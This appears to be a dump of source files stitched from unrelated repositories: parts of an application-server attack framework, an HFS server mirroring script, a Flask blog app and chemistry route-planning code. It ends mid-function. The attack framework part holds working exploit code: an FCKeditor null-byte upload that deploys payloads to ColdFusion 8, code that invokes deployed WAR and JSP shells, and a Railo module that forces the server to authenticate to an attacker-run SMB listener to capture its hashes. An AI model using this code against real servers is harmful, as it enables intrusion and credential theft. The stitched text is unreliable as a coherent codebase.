fpath = [abspath("./src/platform/%s/fingerprints" % service)]
match_fps = []
fingerprints = list(pkgutil.iter_modules(fpath))
for fingerprint in fingerprints:
fp = fingerprint[0].find_module(fingerprint[1]).load_module(fingerprint[1])
fp = fp.FPrint()
#Only try to fingerprint if we have a port match
if fp.check(host, port):
# set fingerprint port to match fingerengine port if defined
match_fps.append(fp)
return match_fps
def runDiscovery(targets,options):
fingerengine = FingerEngine()
fingerengine.options = options
'''Run a fingerprint on each host/port/platform combination'''
for host in targets:
utility.Msg("Beginning discovery scan on host %s" % (host))
for platform in state.supported_platforms:
for port in targets[host]:
for fp in doFingerprint(host,port[0],port[1],platform):
utility.Msg("\t%s (version %s port %s)" % (fp.title,
fp.version, port[0]), LOG.SUCCESS)
def run(options):
"""
This module takes an input file (for now, nmap gnmap output) with host IP addresses
and ports and runs the clusterd fingerprinting engine on all HTTP/S servers
identified. All common app server URLs will be checked for each server in order to
attempt to identify what may be running.
"""
"""Read the input file, for now we only support nmap gnmap - should have been run with
the -sV flag to detect HTTP/S servers on non-standard ports"""
try:
targets={}
inFile = open(options.discovery_file,'r')
if(detectFileType(inFile) == 'gnmap'):
targets = parseGnmap(inFile)
else:
utility.Msg("Discovery input file does not appear to be in nmap gnmap format", LOG.ERROR)
return
inFile.close()
runDiscovery(targets,options)
except KeyboardInterrupt:
pass
except OSError:
utility.Msg("Error loading gnmap file for discovery", LOG.ERROR)
```
#### File: src/module/invoke_payload.py
```python
from src.module.deploy_utils import parse_war_path
from time import sleep
from commands import getoutput
from log import LOG
import utility
import state
def invoke(fingerengine, fingerprint, deployer):
"""
"""
if fingerengine.service in ["jboss", "tomcat", "weblogic", "glassfish"]:
if fingerengine.service == 'glassfish' or\
(fingerengine.service == 'jboss' and\
fingerprint.version in ['7.0', '7.1', '8.0', '8.1']):
# different port; if this has changed from default, we may need
# to iterate through fingerprints to find the correct one...
fingerprint.port = 8080
return invoke_war(fingerengine, fingerprint)
elif fingerengine.service in ["coldfusion"]:
return invoke_cf(fingerengine, fingerprint, deployer)
elif fingerengine.service in ['railo']:
return invoke_rl(fingerengine, fingerprint, deployer)
elif fingerengine.service in ['axis2']:
return invoke_axis2(fingerengine, fingerprint, deployer)
else:
utility.Msg("Platform %s does not support --invoke" %
fingerengine.options.remote_service, LOG.ERROR)
def invoke_war(fingerengine, fingerprint):
""" Invoke a deployed WAR or JSP file on the remote server.
This uses unzip because Python's zip module isn't very portable or
fault tolerant; i.e. it fails to parse msfpayload-generated WARs, though
this is a fault of metasploit, not the Python module.
"""
dfile = fingerengine.options.deploy
jsp = ''
if '.war' in dfile:
jsp = getoutput("unzip -l %s | grep jsp" % dfile).split(' ')[-1]
elif '.jsp' in dfile:
jsp = parse_war_path(dfile, True)
if jsp == '':
utility.Msg("Failed to find a JSP in the deployed WAR", LOG.DEBUG)
return
utility.Msg("Using JSP {0} from {1} to invoke".format(jsp, dfile), LOG.DEBUG)
war_path = parse_war_path(dfile)
try:
# for jboss ejb/jmx invokers, we append a random integer
# in case multiple deploys of the same name are used
if fingerengine.random_int:
war_path += fingerengine.random_int
except:
pass
url = "http://{0}:{1}/{2}/{3}".format(
fingerengine.options.ip,
fingerprint.port,
war_path,
jsp)
if _invoke(url):
utility.Msg("{0} invoked at {1}".format(war_path, fingerengine.options.ip))
else:
utility.Msg("Failed to invoke {0}".format(parse_war_path(dfile, True)),
LOG.ERROR)
def invoke_cf(fingerengine, fingerprint, deployer):
"""
"""
dfile = parse_war_path(fingerengine.options.deploy, True)
if fingerprint.version in ["10.0"]:
# deployments to 10 require us to trigger a 404
url = "http://{0}:{1}/CFIDE/ad123.cfm".format(fingerengine.options.ip,
fingerprint.port)
elif fingerprint.version in ["8.0"] and "fck_editor" in deployer.__name__:
# invoke a shell via FCKeditor deployer
url = "http://{0}:{1}/userfiles/file/{2}".format(fingerengine.options.ip,
fingerprint.port,
dfile)
elif 'lfi_stager' in deployer.__name__:
url = 'http://{0}:{1}/{2}'.format(fingerengine.options.ip,
fingerprint.port,
dfile)
else:
url = "http://{0}:{1}/CFIDE/{2}".format(fingerengine.options.ip,
fingerprint.port,
dfile)
if _invoke(url):
utility.Msg("{0} invoked at {1}".format(dfile, fingerengine.options.ip))
else:
utility.Msg("Failed to invoke {0}".format(dfile), LOG.ERROR)
def invoke_rl(fingerengine, fingerprint, deployer):
"""
"""
dfile = parse_war_path(fingerengine.options.deploy, True)
url = 'http://{0}:{1}/{2}'.format(fingerengine.options.ip, fingerprint.port,
dfile)
if _invoke(url):
utility.Msg("{0} invoked at {1}".format(dfile, fingerengine.options.ip))
else:
utility.Msg("Failed to invoke {0}".format(dfile), LOG.ERROR)
def invoke_axis2(fingerengine, fingerprint, deployer):
""" Invoke an Axis2 payload
"""
dfile = parse_war_path(fingerengine.options.deploy)
url = 'http://{0}:{1}/axis2/services/{2}'.format(
fingerengine.options.ip, fingerprint.port,
dfile)
if fingerprint.version not in ['1.6']:
# versions < 1.6 require an explicit invocation of run
url += '/run'
utility.Msg("Attempting to invoke...")
if _invoke(url):
utility.Msg("{0} invoked at {1}".format(dfile, fingerengine.options.ip))
return
utility.Msg("Failed to invoke {0}".format(dfile), LOG.ERROR)
def _invoke(url):
""" Make the request
"""
status = False
cnt = 0
try:
# Some servers take a second or two to deploy the application; probe for state.timeout * 2
while cnt < state.timeout:
response = utility.requests_get(url)
if response.status_code in [200, 202]:
status = True
break
cnt += 1
sleep(2)
except Exception, e:
utility.Msg("Failed to invoke payload: %s" % e, LOG.ERROR)
status = False
return status
```
#### File: axis2/fingerprints/AX12.py
```python
from src.platform.axis2.interfaces import DefaultServer
class FPrint(DefaultServer):
def __init__(self):
super(FPrint, self).__init__()
self.version = '1.2'
```
#### File: coldfusion/deployers/fck_editor.py
```python
from src.platform.coldfusion.interfaces import CINTERFACES
from src.module.deploy_utils import parse_war_path
from os.path import abspath
from log import LOG
import utility
title = CINTERFACES.CFM
versions = ['8.0']
def deploy(fingerengine, fingerprint):
""" Exploits the exposed FCKeditor in CF 8.x
"""
cfm_path = abspath(fingerengine.options.deploy)
cfm_name = parse_war_path(cfm_path, True)
dip = fingerengine.options.ip
utility.Msg("Checking if FCKEditor is exposed...")
url = "http://{0}:{1}".format(dip, fingerprint.port)
uri = "/CFIDE/scripts/ajax/FCKeditor/editor/dialog/fck_about.html"
response = utility.requests_get(url + uri)
if response.status_code is 200 and "FCKeditor" in response.content:
utility.Msg("FCKeditor exposed, attempting to write payload...")
else:
utility.Msg("FCKeditor doesn't seem to be exposed (HTTP %d)" % response.status_code)
return
try:
payload = {"NewFile" : ("asdf.txt", open(cfm_path, "r").read())}
except Exception, e:
utility.Msg("Error reading file: %s" % e, LOG.ERROR)
return
uri = "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm"
uri += "?Command=FileUploads&Type=File&CurrentFolder=/{0}%00".format(cfm_name)
response = utility.requests_post(url + uri, files=payload)
if response.status_code == 200 and "OnUploadCompleted" in response.content:
utility.Msg("Deployed. Access /userfiles/file/{0} for payload"\
.format(cfm_name), LOG.SUCCESS)
else:
utility.Msg("Could not write payload (HTTP %d)" % (response.status_code))
```
#### File: jboss/fingerprints/JBoss71Manage.py
```python
from src.platform.jboss.interfaces import JINTERFACES
from cprint import FingerPrint
class FPrint(FingerPrint):
def __init__(self):
self.platform = "jboss"
self.version = "7.1"
self.title = JINTERFACES.MM
self.uri = "/console/app/gwt/chrome/chrome_rtl.css"
self.port = 9990
self.hash = "14755bd918908c2703c57bd1a52046b6"
```
#### File: railo/auxiliary/smb_hashes.py
```python
from src.platform.railo.authenticate import checkAuth
from src.platform.railo.interfaces import RINTERFACES
from src.lib.cifstrap import Handler
from auxiliary import Auxiliary
from threading import Thread
from time import sleep
from os import getuid
from log import LOG
import socket
import utility
import state
class Auxiliary:
def __init__(self):
self.name = 'Obtain SMB hash'
self.versions = ['3.3', '4.0']
self.flag = 'rl-smb'
self._Listen = False
def check(self, fingerprint):
if fingerprint.version in self.versions and fingerprint.title \
in [RINTERFACES.WEB]:
return True
return False
def run(self, fingerengine, fingerprint):
""" Create a search collection via a nonexistent
datasource
"""
if getuid() > 0:
utility.Msg("Root privs required for this module.", LOG.ERROR)
return
utility.Msg("Setting up SMB listener...")
self._Listen = True
thread = Thread(target=self.smb_listener)
thread.start()
utility.Msg("Invoking UNC deployer...")
base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
uri = "/railo-context/admin/web.cfm?action=services.search"
data = { "collName" : "asdf",
"collPath" : "\\\\{0}\\asdf".format(utility.local_address()),
"collLanguage" : "english",
"run" : "create"
}
url = base + uri
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title)
if not cookies:
utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip,
fingerprint.port),
LOG.ERROR)
self._Listen = False
return
response = utility.requests_post(url, data=data, cookies=cookies)
while thread.is_alive():
# spin...
sleep(1)
if response.status_code != 200:
utility.Msg("Unexpected response: HTTP %d" % response.status_code)
self._Listen = False
def smb_listener(self):
""" Accept a connection and pass it off for parsing to cifstrap
"""
try:
handler = None
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(state.timeout)
sock.bind(('', 445))
sock.listen(1)
while self._Listen:
try:
(con, addr) = sock.accept()
except:
# timeout
return
handler = Handler(con, addr)
handler.start()
while handler.is_alive():
# spin...
sleep(1)
if handler.data:
utility.Msg("%s" % handler.data, LOG.SUCCESS)
break
except Exception, e:
utility.Msg("Socket error: %s" % e, LOG.ERROR)
finally:
sock.close()
```
#### File: tomcat/fingerprints/Tomcat33.py
```python
from src.platform.tomcat.interfaces import AppInterface
class FPrint(AppInterface):
def __init__(self):
super(FPrint, self).__init__()
self.version = "3.3"
self.uri = "/doc/readme"
```
#### File: weblogic/fingerprints/WL12s.py
```python
from src.platform.weblogic.interfaces import WINTERFACES, WLConsole
class FPrint(WLConsole):
def __init__(self):
super(FPrint, self).__init__()
self.version = "12"
self.title = WINTERFACES.WLS
self.port = 9002
self.ssl = True
``` |
{
"source": "0x27/hfsdump",
"score": 3
} |
#### File: 0x27/hfsdump/hfsdump.py
```python
from clint.textui import progress
import requests
import argparse
import urlparse
import sys
def do_list(listfile):
print "{+} Using list: %s" %(listfile)
# mirrors a list of servers
try:
f = open(listfile, "r")
except Exception, e:
sys.exit("{!} Abort: Could not read listfile")
urls = f.readlines()
for url in urls:
mirror_url(url.strip())
def mirror_url(url):
# mirrors a server
print "{+} Mirroring %s" %(url)
mirror_url = url + "/?mode=archive&recursive"
host = urlparse.urlparse(url).netloc
if ":" in host:
host = host.replace(":", "_")
outfile = "output/mirror-%s.tar" %(host) # mirror- prefix and s/:/_/g because fuck gnu-tar
print "{*} Saving to %s" %(outfile)
try:
r = requests.get(url=mirror_url, stream=True)
with open(outfile, 'wb') as f:
total_length = int(r.headers.get('content-length'))
for chunk in progress.bar(r.iter_content(chunk_size=1024), expected_size=(total_length/1024) + 1):
if chunk:
f.write(chunk)
f.flush()
except Exception, e:
print "{!} Mirroring failed."
return False
print "{*} Done!"
return True
def main():
parser = argparse.ArgumentParser()
parser.add_argument("target", help="url or list of urls (if list, use -l flag)")
parser.add_argument("-l", action="store_true", help="Use listfile")
args = parser.parse_args()
if args.l:
do_list(args.target)
else:
mirror_url(args.target)
if __name__ == "__main__":
main()
``` |
{
"source": "0x29a/buggy",
"score": 3
} |
#### File: buggy/comment/models.py
```python
import datetime as dt
from buggy.database import (Column, Model, SurrogatePK, db, reference_col,
relationship)
class Comment(SurrogatePK, Model):
"""Comments model."""
__tablename__ = 'comments'
name = Column(db.String(80), nullable=True)
email = Column(db.String(80), unique=True, nullable=True)
text = Column(db.Text(500), nullable=False)
post_id = reference_col('posts', nullable=False)
post = relationship('Post', backref='comments')
created_at = Column(db.DateTime, default=dt.datetime.utcnow)
def __repr__(self):
"""Represent instance as a unique string."""
return '<Comment({title})>'.format(title=self.id)
@property
def cute_date(self):
"""Date cutifier."""
return self.created_at.strftime('%B %d, %Y at %I:%M %p')
```
#### File: buggy/buggy/database.py
```python
from .compat import basestring
from .extensions import db
# Alias common SQLAlchemy names
Column = db.Column
relationship = db.relationship
class CRUDMixin(object):
"""
Mixin that adds convenience methods for
CRUD (create, read, update, delete) operations.
"""
@classmethod
def create(cls, **kwargs):
"""
Sugar
"""
instance = cls(**kwargs)
return instance.save()
def update(self, commit=True, **kwargs):
"""More sugar"""
for attr, value in kwargs.items():
setattr(self, attr, value)
return commit and self.save() or self
def save(self, commit=True):
"""SUGAR"""
db.session.add(self)
if commit:
db.session.commit()
return self
def delete(self, commit=True):
"""...sugar"""
db.session.delete(self)
return commit and db.session.commit()
class Model(CRUDMixin, db.Model):
"""
Base model class that includes CRUD convenience methods.
"""
__abstract__ = True # Tells alchemy not to create table in database
class SurrogatePK(object):
"""
A mixin that adds surrogate primary key field 'id' to any
declarative-mapped class.
"""
__table_args__ = {'extend_existing': True}
id = db.Column(db.Integer, primary_key=True)
@classmethod
def get_by_id(cls, record_id):
"""
Gets object by it's id.
"""
if any(
(isinstance(record_id, basestring) and record_id.isdigit(),
isinstance(record_id, (int, float)))
):
return cls.query.get(int(record_id))
return None
def reference_col(tablename, nullable=False, pk_name='id', **kwargs):
"""
Stores references.
"""
return db.Column(
db.ForeignKey('{0}.{1}'.format(tablename, pk_name)),
nullable=nullable, **kwargs
)
```
#### File: buggy/post/utils.py
```python
from .models import Tag
def tags_by_data(data):
"""
By single request to DB returns all tags that must be attached to post.
"""
input_tags = set(map(str.strip, data.split(',')))
input_tags.discard('')
existing_tags = Tag.query.filter(Tag.name.in_(input_tags))
new_tags = input_tags - set(map(str, existing_tags))
# Return just created and already existed tags.
return [Tag(name=tag) for tag in new_tags] + list(existing_tags)
```
#### File: buggy/user/models.py
```python
import datetime as dt
from flask_login import UserMixin
from buggy.database import (Column, Model, SurrogatePK, db, reference_col,
relationship)
from buggy.extensions import bcrypt
class Role(SurrogatePK, Model):
"""Role model."""
__tablename__ = 'roles'
name = Column(db.String(80), unique=True, nullable=False)
user_id = reference_col('users', nullable=True)
user = relationship('User', backref='roles')
def __init__(self, name, **kwargs):
"""Forces to create instance with specific arguments."""
db.Model.__init__(self, name=name, **kwargs)
def __repr__(self):
"""Represent instance as a unique string."""
return '<Role({name})>'.format(name=self.name)
class User(UserMixin, SurrogatePK, Model):
"""User model."""
__tablename__ = 'users'
username = Column(db.String(80), unique=True, nullable=False)
email = Column(db.String(80), unique=True, nullable=True)
#: The hashed password
password = Column(db.Binary(128), nullable=False)
created_at = Column(
db.DateTime, nullable=False, default=dt.datetime.utcnow
)
first_name = Column(db.String(30), nullable=True)
last_name = Column(db.String(30), nullable=True)
is_active = Column(db.Boolean(), default=False)
is_admin = Column(db.Boolean(), default=False)
def __init__(self, username, password, **kwargs):
"""Forces to create instance with specific arguments."""
db.Model.__init__(self, username=username, password=password, **kwargs)
self.set_password(password)
def set_password(self, password):
"""
Generate bcrypt hash of password string.
"""
self.password = bcrypt.generate_password_hash(password)
def check_password(self, value):
"""
Verify that hash of value == hash of password.
"""
return bcrypt.check_password_hash(self.password, value)
@property
def full_name(self):
"""Full name."""
return '{0} {1}'.format(self.first_name, self.last_name)
def __repr__(self):
"""Represent instance as a unique string."""
return '<User({username!r})>'.format(username=self.username)
``` |
{
"source": "0x2b3bfa0/aizynthfinder",
"score": 3
} |
#### File: interfaces/gui/clustering.py
```python
import matplotlib.pylab as plt
import numpy as np
from ipywidgets import Output, Label, BoundedIntText, Button, HBox, Tab
from IPython.display import display
from scipy.cluster.hierarchy import dendrogram
from aizynthfinder.utils.route_clustering import ClusteringHelper
class ClusteringGui:
"""
GUI extention to cluster routes
:param routes: the routes to cluster
:type routes: RouteCollection
:param content: what to cluster on
:type content: TreeContent, optional
"""
def __init__(self, routes, content="both"):
self._routes = routes
self._routes.distance_matrix(content=content, recreate=True)
self._input = dict()
self._output = dict()
self._buttons = dict()
self._create_dendogram()
self._create_input()
self._create_output()
@classmethod
def from_app(self, app, content="both"):
"""
Helper function to create a GUI from a GUI app interface
:param app: the app to extract the routes from
:type app: AiZynthApp
:param content: what to cluster on
:type content: TreeContent, optional
:return: the GUI object
:rtype: ClusteringGUI
"""
return ClusteringGui(app.finder.routes, content)
def _create_dendogram(self):
dend_out = Output(
layout={"width": "99%", "height": "310px", "overflow_y": "auto"}
)
with dend_out:
print("This is the hierarchy of the routes")
fig = plt.Figure()
dendrogram(
ClusteringHelper(self._routes.distance_matrix()).linkage_matrix(),
color_threshold=0.0,
labels=np.arange(1, len(self._routes) + 1),
ax=fig.gca(),
)
fig.gca().set_xlabel("Route")
fig.gca().set_ylabel("Distance")
display(fig)
display(dend_out)
def _create_input(self):
self._input["number_clusters"] = BoundedIntText(
continuous_update=True,
min=1,
max=len(self._routes) - 1,
layout={"width": "80px"},
)
self._buttons["cluster"] = Button(description="Cluster")
self._buttons["cluster"].on_click(self._on_cluster_button_clicked)
box = HBox(
[
Label("Number of clusters to make"),
self._input["number_clusters"],
self._buttons["cluster"],
]
)
display(box)
help_out = Output()
with help_out:
print(
"Optimization is carried out if the number of given clusters are less than 2"
)
display(help_out)
def _create_output(self):
self._output["clusters"] = Tab()
display(self._output["clusters"])
def _on_cluster_button_clicked(self, _):
self._buttons["cluster"].enabled = False
self._routes.cluster(self._input["number_clusters"].value)
self._buttons["cluster"].enabled = True
outputs = []
for i, cluster in enumerate(self._routes.clusters):
output = Output(
layout={
"border": "1px solid silver",
"width": "99%",
"height": "500px",
"overflow_y": "auto",
}
)
with output:
for image in cluster.images:
print(f"Route {self._routes.images.index(image)+1}")
display(image)
outputs.append(output)
self._output["clusters"].set_title(i, f"Cluster {i+1}")
self._output["clusters"].children = outputs
```
#### File: aizynthfinder/utils/analysis_helpers.py
```python
import abc
from collections import defaultdict
import networkx as nx
from aizynthfinder.chem import (
Molecule,
UniqueMolecule,
FixedRetroReaction,
hash_reactions,
)
from aizynthfinder.utils.image import make_visjs_page
class _ReactionTreeLoader(abc.ABC):
""" Base class for classes that creates a reaction tree object
"""
def __init__(self, *args, **kwargs):
# To avoid circular imports
from aizynthfinder.analysis import ReactionTree # noqa
self.tree = ReactionTree()
self._load(*args, **kwargs)
self.tree.is_solved = all(
self.tree.in_stock(node) for node in self.tree.leafs()
)
_RepeatingPatternIdentifier.find(self.tree)
def _add_node(self, node, depth=0, transform=0, in_stock=False, hide=False):
attributes = {
"hide": hide,
"depth": depth,
}
if isinstance(node, Molecule):
attributes.update({"transform": transform, "in_stock": in_stock})
self.tree.graph.add_node(node, **attributes)
if not self.tree.root:
self.tree.root = node
@abc.abstractmethod
def _load(self, *args, **kwargs):
pass
class ReactionTreeFromDict(_ReactionTreeLoader):
"""
Creates a reaction tree object from a dictionary
:param tree_dict: the dictionary representation
:type tree_dict: dict
"""
def _load(self, tree_dict):
self._parse_tree_dict(tree_dict)
def _parse_tree_dict(self, tree_dict, ncalls=0):
product_node = UniqueMolecule(smiles=tree_dict["smiles"])
self._add_node(
product_node,
depth=2 * ncalls,
transform=ncalls,
hide=tree_dict.get("hide", False),
in_stock=tree_dict["in_stock"],
)
rxn_tree_dict = tree_dict.get("children", [])
if not rxn_tree_dict:
return product_node
rxn_tree_dict = rxn_tree_dict[0]
reaction_node = FixedRetroReaction(
product_node,
smiles=rxn_tree_dict["smiles"],
metadata=rxn_tree_dict.get("metadata", {}),
)
self._add_node(
reaction_node, depth=2 * ncalls + 1, hide=rxn_tree_dict.get("hide", False)
)
self.tree.graph.add_edge(product_node, reaction_node)
reactant_nodes = []
for reactant_tree in rxn_tree_dict.get("children", []):
reactant_node = self._parse_tree_dict(reactant_tree, ncalls + 1)
self.tree.graph.add_edge(reaction_node, reactant_node)
reactant_nodes.append(reactant_node)
reaction_node.reactants = reactant_nodes
return product_node
class ReactionTreeFromMcts(_ReactionTreeLoader):
"""
Creates a reaction tree object from MCTS nodes and reaction objects
:param actions: the reactions forming the route
:type actions: list of RetroReaction
:param nodes: the MCTS nodes forming the route
:type nodes: list of Node
"""
def _load(self, actions, nodes):
self._unique_mols = {}
root_mol = nodes[0].state.mols[0]
self._unique_mols[id(root_mol)] = root_mol.make_unique()
self._add_node(
self._unique_mols[id(root_mol)], in_stock=nodes[0].state.is_solved,
)
for child, action in zip(nodes[1:], actions):
self._add_bipartite(child, action)
def _add_bipartite(self, child, action):
reaction_obj = FixedRetroReaction(
self._unique_mol(action.mol), smiles=action.smiles, metadata=action.metadata
)
self._add_node(reaction_obj, depth=action.mol.transform + 1)
self.tree.graph.add_edge(self._unique_mol(action.mol), reaction_obj)
reactant_nodes = []
for mol in child.state.mols:
if mol.parent is action.mol:
self._add_node(
self._unique_mol(mol),
depth=2 * mol.transform,
transform=mol.transform,
in_stock=mol in child.state.stock,
)
self.tree.graph.add_edge(reaction_obj, self._unique_mol(mol))
reactant_nodes.append(self._unique_mol(mol))
reaction_obj.reactants = reactant_nodes
def _unique_mol(self, molecule):
id_ = id(molecule)
if id_ not in self._unique_mols:
self._unique_mols[id_] = molecule.make_unique()
return self._unique_mols[id_]
class _RepeatingPatternIdentifier:
"""
Encapsulation of algorithm to identify repeating patterns of reactions and mark them as hidden.
A unit of the repetition is the hash of two consecutive reactions,
where the first unit should be the first two reactions of the route.
This is for hiding repeating patterns of e.g. protection followed by deprotection,
which is a common behaviour for the tree search when it fails to solve a route.
"""
@staticmethod
def find(reaction_tree):
"""
Find the repeating patterns and mark the nodes
:param reaction_tree: the reaction tree to process
:type reaction_tree: ReactionTree
"""
for node in reaction_tree.reactions():
# We are only interesting of starting at the very first reaction
if any(reaction_tree.graph[mol] for mol in node.reactants[0]):
continue
actions = _RepeatingPatternIdentifier._list_reactions(reaction_tree, node)
if len(actions) < 5:
continue
hashes = [
hash_reactions([rxn1, rxn2], sort=False)
for rxn1, rxn2 in zip(actions[:-1:2], actions[1::2])
]
for idx, (hash1, hash2) in enumerate(zip(hashes[:-1], hashes[1:])):
if hash1 == hash2:
_RepeatingPatternIdentifier._hide_reaction(
reaction_tree, actions[idx * 2]
)
_RepeatingPatternIdentifier._hide_reaction(
reaction_tree, actions[idx * 2 + 1]
)
reaction_tree.has_repeating_patterns = True
# The else-clause prevents removing repeating patterns in the middle of a route
else:
break
@staticmethod
def _hide_reaction(reaction_tree, reaction_node):
reaction_tree.graph.nodes[reaction_node]["hide"] = True
for reactants in reaction_node.reactants[0]:
reaction_tree.graph.nodes[reactants]["hide"] = True
@staticmethod
def _list_reactions(reaction_tree, reaction_node):
""" List all reaction nodes from the given one to the last
"""
reactions = [reaction_node]
curr_rxn = reaction_node
product = reaction_node.mol
while product is not reaction_tree.root:
curr_rxn = next(reaction_tree.graph.predecessors(product))
product = curr_rxn.mol
reactions.append(curr_rxn)
return reactions
class CombinedReactionTrees:
"""
Encapsulation of an algorithm that combines several reaction trees into a
larger bipartite graph with all reactions and molecules.
The reactions at a specific level of the reaction trees are grouped based
on the reaction smiles.
:params reactions_trees: the list of reaction trees to combine
:type reaction_trees: list of ReactionTree
"""
def __init__(self, reaction_trees):
self.graph = nx.DiGraph()
first_rt = reaction_trees[0]
# This is to avoid circular imports
self._reaction_tree_class = first_rt.__class__
self.root = first_rt.root
self.graph.add_node(self.root, in_stock=first_rt.in_stock(self.root))
rt_node_spec = [(rt.root, rt.graph) for rt in reaction_trees]
self._add_reaction_trees_to_node(self.root, rt_node_spec)
def to_dict(self):
"""
Returns the graph as a dictionary in a pre-defined format.
:return: the combined reaction trees
:rtype: dict
"""
rt = self._reaction_tree_class()
rt.root = self.root
rt.graph = self.graph
return rt.to_dict()
def to_visjs_page(
self, filename, in_stock_colors={True: "green", False: "orange"},
):
"""
Create a visualization of the combined reaction tree using the vis.js network library.
The HTML page and all the images will be put into a tar-ball.
:param filename: the name of the tarball
:type filename: str
:param in_stock_colors: the colors around molecules, defaults to {True: "green", False: "orange"}
:type in_stock_colors: dict, optional
"""
molecules = [node for node in self.graph if isinstance(node, Molecule)]
reactions = [node for node in self.graph if not isinstance(node, Molecule)]
frame_colors = [
in_stock_colors[self.graph.nodes[node].get("in_stock", False)]
for node in molecules
]
make_visjs_page(filename, molecules, reactions, self.graph.edges, frame_colors)
def _add_reaction_trees_to_node(self, base_node, rt_node_spec):
reaction_groups = defaultdict(list)
# Group the reactions from the nodes at this level based on the reaction smiles
for node, graph in rt_node_spec:
for reaction in graph[node]:
reaction_groups[reaction.reaction_smiles()].append((graph, reaction))
for group in reaction_groups.values():
# Use the first RT in each group as the base
first_graph, first_reaction = group[0]
reaction_node = first_reaction.copy()
self.graph.add_edge(base_node, reaction_node)
for child in first_graph[first_reaction]:
mol_node = child.make_unique()
self.graph.add_node(
mol_node, in_stock=first_graph.nodes[child].get("in_stock", False)
)
self.graph.add_edge(reaction_node, mol_node)
self._add_reaction_trees_to_node(
mol_node, self._find_other_children(child, group)
)
@staticmethod
def _find_other_children(child, group):
children_spec = []
for other_graph, other_reaction in group:
found = False
for other_child in other_graph[other_reaction]:
if other_child.inchi_key == child.inchi_key:
children_spec.append((other_child, other_graph))
found = True
break
if not found:
raise ValueError("Could not find other child")
return children_spec
```
#### File: utils/route_clustering/distances.py
```python
import random
import itertools
import math
from enum import Enum
from operator import itemgetter
import numpy as np
from apted import Config as BaseAptedConfig
from apted import APTED as Apted
from scipy.spatial.distance import jaccard as jaccard_dist
from aizynthfinder.chem import Molecule
from aizynthfinder.utils.logging import logger
class TreeContent(str, Enum):
""" Possibilities for distance calculations on reaction trees
"""
MOLECULES = "molecules"
REACTIONS = "reactions"
BOTH = "both"
class AptedConfig(BaseAptedConfig):
"""
This is a helper class for the tree edit distance
calculation. It defines how the substitution
cost is calculated and how to obtain children nodes.
:param randomize: if True, the children will be shuffled
:type randomize: bool, optional
:param sort_children: if True, the children will be sorted
:type sort_children: bool, optional
"""
def __init__(self, randomize=False, sort_children=False):
super().__init__()
self._randomize = randomize
self._sort_children = sort_children
def rename(self, node1, node2):
if node1["type"] != node2["type"]:
return 1
fp1 = node1["fingerprint"]
fp2 = node2["fingerprint"]
return jaccard_dist(fp1, fp2)
def children(self, node):
if self._sort_children:
return sorted(node["children"], key=itemgetter("sort_key"))
if not self._randomize:
return node["children"]
children = list(node["children"])
random.shuffle(children)
return children
class ReactionTreeWrapper:
"""
Wrapper or a reaction tree that can calculate distances between
trees.
:param reaction_tree: the reaction tree to wrap
:type reaction_tree: ReactionTree
:param content: the content of the route to consider in the distance calculation
:type content: TreeContent, optional
:param exhaustive_limit: if the number of possible ordered trees are below this limit create them all
:type exhaustive_limit: int, optional
"""
_index_permutations = {
n: list(itertools.permutations(range(n), n)) for n in range(1, 8)
}
def __init__(
self, reaction_tree, content=TreeContent.MOLECULES, exhaustive_limit=20
):
self._logger = logger()
# Will convert string input automatically
self._content = TreeContent(content)
self._graph = reaction_tree.graph
self._root = self._make_root(reaction_tree)
self._trees = []
self._tree_count, self._node_index_list = self._inspect_tree()
self._enumeration = self._tree_count <= exhaustive_limit
if not self._root:
return
if self._enumeration:
self._create_all_trees()
else:
self._trees.append(self._create_tree_recursively(self._root))
@property
def info(self):
""" Return a dictionary with internal information about the wrapper
"""
return {
"content": self._content,
"tree count": self._tree_count,
"enumeration": self._enumeration,
"root": self._root,
}
@property
def first_tree(self):
""" Return the first created ordered tree
"""
return self._trees[0]
@property
def trees(self):
""" Return a list of all created ordered trees
"""
return self._trees
def distance_iter(self, other, exhaustive_limit=20):
"""
Iterate over all distances computed between this and another tree
There are three possible enumeration of distances possible dependent
on the number of possible ordered trees for the two routes that are compared
* If the product of the number of possible ordered trees for both routes are
below `exhaustive_limit` compute the distance between all pair of trees
* If both self and other has been fully enumerated (i.e. all ordered trees has been created)
compute the distances between all trees of the route with the most ordered trees and
the first tree of the other route
* Compute `exhaustive_limit` number of distances by shuffling the child order for
each of the routes.
The rules are applied top-to-bottom.
:param other: another tree to calculate distance to
:type other: ReactionTreeWrapper
:param exhaustive_limit: used to determine what type of enumeration to do
:type exhaustive_limit: int, optional
:yield: the next computed distance between self and other
:rtype: float
"""
if len(self.trees) * len(other.trees) < exhaustive_limit:
yield from self._distance_iter_exhaustive(other)
elif self._enumeration or other.info["enumeration"]:
yield from self._distance_iter_semi_exhaustive(other)
else:
yield from self._distance_iter_random(other, exhaustive_limit)
def distance_to(self, other, exhaustive_limit=20):
"""
Calculate the minimum distance from this route to another route
Enumerate the distances using `distance_iter`.
:param other: another tree to calculate distance to
:type other: ReactionTreeWrapper
:param exhaustive_limit: used to determine what type of enumeration to do
:type exhaustive_limit: int, optional
:return: the miminum distance
:rtype: float
"""
min_dist = 1e6
min_iter = -1
for iteration, distance in enumerate(
self.distance_iter(other, exhaustive_limit)
):
if distance < min_dist:
min_iter = iteration
min_dist = distance
self._logger.debug(f"Found minimum after {min_iter} iterations")
return min_dist
def distance_to_with_sorting(self, other):
"""
Compute the distance to another tree, by simpling sorting the children
of both trees. This is not guaranteed to return the minimum distance.
:param other: another tree to calculate distance to
:type other: ReactionTreeWrapper
:return: the distance
:rtype: float
"""
config = AptedConfig(sort_children=True)
return Apted(self.first_tree, other.first_tree, config).compute_edit_distance()
def _compute_fingerprint(self, node):
if isinstance(node, Molecule):
return node.fingerprint(radius=2).astype(int)
# Difference fingerprint for reactions
product = next(self._graph.predecessors(node))
fp = product.fingerprint(radius=2).copy()
for reactant in self._graph.successors(node):
fp -= reactant.fingerprint(radius=2)
return fp.astype(int)
def _create_all_trees(self):
self._trees = []
# Iterate over all possible combinations of child order
for order_list in itertools.product(*self._node_index_list):
order_dict = {idict["node"]: idict["child_order"] for idict in order_list}
self._trees.append(self._create_tree_recursively(self._root, order_dict))
def _create_tree_recursively(self, node, order_dict=None):
